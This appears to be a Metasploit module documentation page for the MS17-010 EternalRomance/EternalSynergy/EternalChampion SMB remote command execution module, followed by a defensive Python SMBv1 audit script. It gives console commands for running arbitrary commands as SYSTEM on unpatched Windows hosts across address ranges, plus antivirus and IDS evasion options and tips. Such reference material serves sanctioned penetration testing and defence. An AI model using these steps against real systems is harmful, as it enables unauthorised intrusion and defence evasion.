MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution - Metasploit
This page contains detailed information about how to use the auxiliary/admin/smb/ms17_010_command Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
Module: auxiliary/admin/smb/ms17_010_command
Source code: modules/auxiliary/admin/smb/ms17_010_command.rb
Disclosure date: 2017-03-14
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: microsoft-ds, netbios-ssn
Target network port(s): 139, 445
List of CVEs: CVE-2017-0143, CVE-2017-0146, CVE-2017-0147
This module is also known as ETERNALSYNERGY, ETERNALROMANCE, ETERNALCHAMPION or ETERNALBLUE.
This module exploits the SMB vulnerabilities covered by MS17-010 to obtain a write-what-where primitive. That primitive is then used to overwrite the connection's session information so that it is treated as an Administrator session, after which the normal psexec command execution is performed. It exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(ms17_010_command) > show options
... show and set options ...
msf auxiliary(ms17_010_command) > set RHOSTS ip-range
msf auxiliary(ms17_010_command) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(ms17_010_command) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(ms17_010_command) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(ms17_010_command) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Introduction
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so your payload may need its own antivirus evasion.
- CVE-2017-0146 (EternalChampion/EternalSynergy) - exploit a race condition with Transaction requests
- CVE-2017-0143 (EternalRomance/EternalSynergy) - exploit a type confusion between WriteAndX and Transaction requests
This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
Vulnerable Server
To be able to use auxiliary/admin/smb/ms17_010_command:
- You can OPTIONALLY use a valid username/password to bypass most of these requirements.
- The firewall must allow SMB traffic.
- The target must use SMBv1.
- The target must be missing the MS17-010 patch.
- The target must allow anonymous IPC$ and a Named Pipe.
You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
If you're having trouble configuring an anonymous named pipe, Microsoft's documentation on the topic may be helpful.
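As an added example, not code from the module or from this page, here is the SMBv1 half of that precondition check in Python: it sends an SMB_COM_NEGOTIATE offering only the NT LM 0.12 dialect and classifies the reply, so a server that accepts it still speaks SMBv1. The header field values and the embedded sample reply are constructed, and the check covers only the SMBv1 requirement, not the patch level or anonymous pipe access.

```python
"""Audit whether an SMB server still negotiates SMBv1 (added example)."""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
# Offer only the SMBv1 dialect; a server that accepts it still speaks SMBv1.
DIALECTS = [b"NT LM 0.12"]
# SMB1 header after the magic: Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures, Reserved, TID, PIDLow, UID, MID (little-endian, 28 bytes).
HDR = "<BIBHH8sHHHHH"


def build_smb1_negotiate(dialects=DIALECTS):
    """Return a NetBIOS-framed SMB_COM_NEGOTIATE request for the dialects."""
    header = SMB1_MAGIC + struct.pack(
        HDR, SMB_COM_NEGOTIATE, 0, 0x18, 0xC801, 0, b"\x00" * 8, 0,
        0xFFFF, 0xFEFF, 0, 0)           # no tree, no session: anonymous
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)
    smb = header + struct.pack("<BH", 0, len(body)) + body  # WordCount 0
    return struct.pack(">I", len(smb)) + smb  # 4-byte NetBIOS length prefix


def classify_negotiate_reply(data, dialects=DIALECTS):
    """Return 'smb1', 'smb2-only' or 'no-smb1' for a raw negotiate reply."""
    if len(data) < 4:
        return "no-smb1"        # reset/closed: server refused the dialect
    payload = data[4:]          # strip the NetBIOS session header
    if payload.startswith(SMB2_MAGIC):
        return "smb2-only"      # server answered with an SMB2 negotiate
    if not payload.startswith(SMB1_MAGIC) or len(payload) < 35:
        return "no-smb1"
    word_count = payload[32]
    if word_count == 0:         # error replies carry no parameter words
        return "no-smb1"
    dialect_index = struct.unpack_from("<H", payload, 33)[0]
    if dialect_index == 0xFFFF or dialect_index >= len(dialects):
        return "no-smb1"        # 0xFFFF: none of the offered dialects accepted
    return "smb1"


def audit_host(host, port=445, timeout=3.0):
    """Connect, negotiate, classify; a reset or timeout counts as no SMBv1."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_smb1_negotiate())
            return classify_negotiate_reply(sock.recv(1024))
    except (ConnectionResetError, socket.timeout):
        return "no-smb1"


# Constructed sample reply from an SMBv1-enabled server: reply flag set,
# WordCount 17, DialectIndex 0 (NT LM 0.12), 16 further words, ByteCount 0.
_smb = SMB1_MAGIC + struct.pack(HDR, SMB_COM_NEGOTIATE, 0, 0x98, 0xC801, 0,
                                b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
_smb += struct.pack("<BH", 17, 0) + b"\x00" * 32 + struct.pack("<H", 0)
SAMPLE_SMB1_REPLY = struct.pack(">I", len(_smb)) + _smb
```

`audit_host("192.0.2.10")` runs the live check against a host you are authorised to audit; the anonymous-pipe and patch-state requirements still need the scanner modules named above.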
Verification Steps
At a minimum, you should be able to use psexec to get a session with a valid credential using the following:
msf > use auxiliary/admin/smb/ms17_010_command
msf auxiliary(ms17_010_command) > set RHOSTS 192.168.1.80
RHOSTS => 192.168.1.80
msf auxiliary(ms17_010_command) > exploit
Options
By default, using auxiliary/admin/smb/ms17_010_command can be as simple as setting the RHOSTS option, and you're ready to go.
The NAMEDPIPE Option
By default, the module tries a list of common named pipes and uses the first one that is accessible. You can instead specify a single pipe by name.
The LEAKATTEMPTS Option
Information leaks are used to keep the exploit stable. A leak does not always succeed on the first try, so this option sets how many attempts are made.
The DBGTRACE Option
Enables extremely verbose output for debugging.
The SMBUser Option
This is a valid Windows username.
The SMBPass option
This can be either the plain text version or the Windows hash.
Scenarios
Automatic Target
There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default. If it detects PowerShell on the remote machine, it uses the PowerShell target; otherwise it falls back to the native upload. Each target is explained below.
PowerShell Target
The PowerShell target forces the psexec module to run a PowerShell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support PowerShell by default.
Because of this, you will probably want to use the Automatic target setting. The automatic mode checks whether the target supports PowerShell before trying it; the manually set PowerShell target does not.
Native Upload Target
The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the SHARE datastore option), and then execute it with psexec.
This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
MOF Upload Target
The MOF target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) to SYSTEM32 and a managed object format file to the SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file tells Windows to execute the payload in SYSTEM32, and you get a session.
Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting caught by antivirus on the target.
The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
Msfconsole Usage
Here is how the admin/smb/ms17_010_command auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/smb/ms17_010_command
msf6 auxiliary(admin/smb/ms17_010_command) > show info
Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
Module: auxiliary/admin/smb/ms17_010_command
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-03-14
Provided by:
sleepya
zerosum0x0
Shadow Brokers
Equation Group
Check supported:
No
Basic options:
Name                  Current Setting                                                              Required  Description
----                  ---------------                                                              --------  -----------
COMMAND               net group "Domain Admins" /domain                                            yes       The command you want to execute on the remote host
DBGTRACE              false                                                                        yes       Show extra debug trace info
LEAKATTEMPTS          99                                                                           yes       How many times to try to leak transaction
NAMEDPIPE                                                                                          no        A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES           /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
RHOSTS                                                                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                 445                                                                          yes       The Target port (TCP)
SERVICE_DESCRIPTION                                                                                no        Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME                                                                               no        The service display name
SERVICE_NAME                                                                                       no        The service name
SMBDomain             .                                                                            no        The Windows domain to use for authentication
SMBPass                                                                                            no        The password for the specified username
SMBSHARE              C$                                                                           yes       The name of a writeable share on the server
SMBUser                                                                                            no        The username to authenticate as
THREADS               1                                                                            yes       The number of concurrent threads (max one per host)
WINPATH               WINDOWS                                                                      yes       The name of the remote Windows directory
Description:
This module will exploit SMB with vulnerabilities in MS17-010 to
achieve a write-what-where primitive. This will then be used to
overwrite the connection session information with as an
Administrator session. From there, the normal psexec command
execution is done. Exploits a type confusion between Transaction and
WriteAndX requests and a race condition in Transaction requests, as
seen in the EternalRomance, EternalChampion, and EternalSynergy
exploits. This exploit chain is more reliable than the EternalBlue
exploit, but requires a named pipe.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://github.com/worawit/MS17-010
https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
Also known as:
ETERNALSYNERGY
ETERNALROMANCE
ETERNALCHAMPION
ETERNALBLUE
Module Options
This is a complete list of options available in the admin/smb/ms17_010_command auxiliary module:
msf6 auxiliary(admin/smb/ms17_010_command) > show options
Module options (auxiliary/admin/smb/ms17_010_command):
Name                  Current Setting                                                              Required  Description
----                  ---------------                                                              --------  -----------
COMMAND               net group "Domain Admins" /domain                                            yes       The command you want to execute on the remote host
DBGTRACE              false                                                                        yes       Show extra debug trace info
LEAKATTEMPTS          99                                                                           yes       How many times to try to leak transaction
NAMEDPIPE                                                                                          no        A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES           /opt/metasploit-framework/embedded/framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
RHOSTS                                                                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT                 445                                                                          yes       The Target port (TCP)
SERVICE_DESCRIPTION                                                                                no        Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME                                                                               no        The service display name
SERVICE_NAME                                                                                       no        The service name
SMBDomain             .                                                                            no        The Windows domain to use for authentication
SMBPass                                                                                            no        The password for the specified username
SMBSHARE              C$                                                                           yes       The name of a writeable share on the server
SMBUser                                                                                            no        The username to authenticate as
THREADS               1                                                                            yes       The number of concurrent threads (max one per host)
WINPATH               WINDOWS                                                                      yes       The name of the remote Windows directory
Advanced Options
Here is a complete list of advanced options supported by the admin/smb/ms17_010_command auxiliary module:
msf6 auxiliary(admin/smb/ms17_010_command) > show advanced
Module advanced options (auxiliary/admin/smb/ms17_010_command):
Name                    Current Setting    Required  Description
----                    ---------------    --------  -----------
CHOST                                      no        The local client address
CPORT                                      no        The local client port
ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
DELAY                   0                  yes       Wait this many seconds before reading output and cleaning up
FILEPREFIX                                 no        Add a custom prefix to the temporary files
NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
RETRY                   0                  yes       Retry this many times to check if the process is complete
SERVICE_PERSIST         false              yes       Create an Auto run service and do not remove it.
SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
SSL                     false              no        Negotiate SSL/TLS for outgoing connections
SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
ShowProgress            true               yes       Display progress messages during a scan
ShowProgressPercent     10                 yes       The interval in percent that progress should be shown
VERBOSE                 false              no        Enable detailed status messages
WORKSPACE                                  no        Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/smb/ms17_010_command module can do:
msf6 auxiliary(admin/smb/ms17_010_command) > show actions
Auxiliary actions:
Name  Description
----  -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/smb/ms17_010_command auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/smb/ms17_010_command) > show evasion
Module evasion options:
Name                             Current Setting  Required  Description
----                             ---------------  --------  -----------
DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
TCP::max_send_size               0                no        Maximum tcp segment size. (0 = disable)
TCP::send_delay                  0                no        Delays inserted before every send. (0 = disable)
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #13812 Merged Pull Request: Add a command target to the main PSexec module
- #13417 Merged Pull Request: SMBv3 integration with Framework
- #13540 Merged Pull Request: Change OptString of RPORT to OptPort
- #11873 Merged Pull Request: Add mixin to implement an exploit's check method by invoking a scanner
- #11523 Merged Pull Request: MSF5: Remove unneeded RHOST deregister in scanners
- #11215 Merged Pull Request: Fix messages /successfuly/successfully
- #11044 Merged Pull Request: Add authenticating... message
- #10570 Merged Pull Request: AKA Metadata Refactor
- #9881 Merged Pull Request: cleanup psexec code
- #9473 Merged Pull Request: MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules
References
- MS17-010
- CVE-2017-0143
- CVE-2017-0146
- CVE-2017-0147
- https://github.com/worawit/MS17-010
- https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
- https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/
See Also
Check also the following modules related to this module:
- exploit/windows/smb/ms17_010_eternalblue
- exploit/windows/smb/ms17_010_eternalblue_win8
- exploit/windows/smb/ms17_010_psexec
- exploit/windows/smb/smb_doublepulsar_rce
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/admin/smb/check_dir_file
- auxiliary/admin/smb/delete_file
- auxiliary/admin/smb/download_file
- auxiliary/admin/smb/list_directory
- auxiliary/admin/smb/psexec_ntdsgrab
- auxiliary/admin/smb/samba_symlink_traversal
- auxiliary/admin/smb/upload_file
- auxiliary/admin/smb/webexec_command
- auxiliary/admin/scada/modicon_command
- auxiliary/admin/scada/multi_cip_command
- auxiliary/admin/scada/pcom_command
- auxiliary/admin/scada/phoenix_command
- auxiliary/scanner/http/jenkins_command
- auxiliary/admin/http/typo3_sa_2010_020
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
- auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/server/regsvr32_command_delivery_server
- exploit/windows/fileformat/office_ms17_11882
Related Nessus plugins:
- MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)
- MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)
Authors
- sleepya
- zerosum0x0
- Shadow Brokers
- Equation Group
Version
This page has been produced using Metasploit Framework version 6.1.28-dev.